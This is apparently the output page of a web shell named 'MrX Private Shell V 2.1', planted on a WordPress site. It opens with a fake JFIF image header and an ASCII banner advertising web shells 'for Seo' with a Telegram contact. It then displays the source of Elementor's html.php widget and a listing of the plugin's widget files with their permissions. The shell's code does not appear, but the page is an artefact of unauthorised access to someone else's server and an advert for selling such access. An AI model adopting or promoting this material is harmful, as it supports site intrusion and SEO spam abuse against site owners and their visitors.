����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
namespace Elementor;
if ( ! defined( 'ABSPATH' ) ) {
exit; // Exit if accessed directly.
}
/**
* Elementor HTML widget.
*
* Elementor widget that insert a custom HTML code into the page.
*
* @since 1.0.0
*/
class Widget_Html extends Widget_Base {
/**
* Get widget name.
*
* Retrieve HTML widget name.
*
* @since 1.0.0
* @access public
*
* @return string Widget name.
*/
public function get_name() {
return 'html';
}
/**
* Get widget title.
*
* Retrieve HTML widget title.
*
* @since 1.0.0
* @access public
*
* @return string Widget title.
*/
public function get_title() {
return __( 'HTML', 'elementor' );
}
/**
* Get widget icon.
*
* Retrieve HTML widget icon.
*
* @since 1.0.0
* @access public
*
* @return string Widget icon.
*/
public function get_icon() {
return 'eicon-code';
}
/**
* Get widget keywords.
*
* Retrieve the list of keywords the widget belongs to.
*
* @since 2.1.0
* @access public
*
* @return array Widget keywords.
*/
public function get_keywords() {
return [ 'html', 'code' ];
}
/**
* Register HTML widget controls.
*
* Adds different input fields to allow the user to change and customize the widget settings.
*
* @since 1.0.0
* @access protected
*/
protected function _register_controls() {
$this->start_controls_section(
'section_title',
[
'label' => __( 'HTML Code', 'elementor' ),
]
);
$this->add_control(
'html',
[
'label' => '',
'type' => Controls_Manager::CODE,
'default' => '',
'placeholder' => __( 'Enter your code', 'elementor' ),
'show_label' => false,
]
);
$this->end_controls_section();
}
/**
* Render HTML widget output on the frontend.
*
* Written in PHP and used to generate the final HTML.
*
* @since 1.0.0
* @access protected
*/
protected function render() {
echo $this->get_settings_for_display( 'html' );
}
/**
* Render HTML widget output in the editor.
*
* Written as a Backbone JavaScript template and used to generate the live preview.
*
* @since 2.9.0
* @access protected
*/
protected function content_template() {
?>
{{{ settings.html }}}
<?php
}
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| accordion.php | File | 17.03 KB | 0644 |
|
| alert.php | File | 8.24 KB | 0644 |
|
| audio.php | File | 7.11 KB | 0644 |
|
| button.php | File | 13.76 KB | 0644 |
|
| common.php | File | 16.73 KB | 0644 |
|
| counter.php | File | 8.06 KB | 0644 |
|
| divider.php | File | 30.48 KB | 0644 |
|
| google-maps.php | File | 5.23 KB | 0644 |
|
| heading.php | File | 7.38 KB | 0644 |
|
| html.php | File | 2.17 KB | 0644 |
|
| icon-box.php | File | 17.78 KB | 0644 |
|
| icon-list.php | File | 17.39 KB | 0644 |
|
| icon.php | File | 11.1 KB | 0644 |
|
| image-box.php | File | 15.66 KB | 0644 |
|
| image-carousel.php | File | 19.19 KB | 0644 |
|
| image-gallery.php | File | 8.59 KB | 0644 |
|
| image.php | File | 17.65 KB | 0644 |
|
| menu-anchor.php | File | 3.06 KB | 0644 |
|
| progress.php | File | 9.46 KB | 0644 |
|
| read-more.php | File | 2.63 KB | 0644 |
|
| shortcode.php | File | 3.01 KB | 0644 |
|
| sidebar.php | File | 2.86 KB | 0644 |
|
| social-icons.php | File | 15.23 KB | 0644 |
|
| spacer.php | File | 3.04 KB | 0644 |
|
| star-rating.php | File | 11.36 KB | 0644 |
|
| tabs.php | File | 11.29 KB | 0644 |
|
| testimonial.php | File | 15.1 KB | 0644 |
|
| text-editor.php | File | 9.8 KB | 0644 |
|
| toggle.php | File | 17.26 KB | 0644 |
|
| video.php | File | 24.92 KB | 0644 |
|
| wordpress.php | File | 7.23 KB | 0644 |
|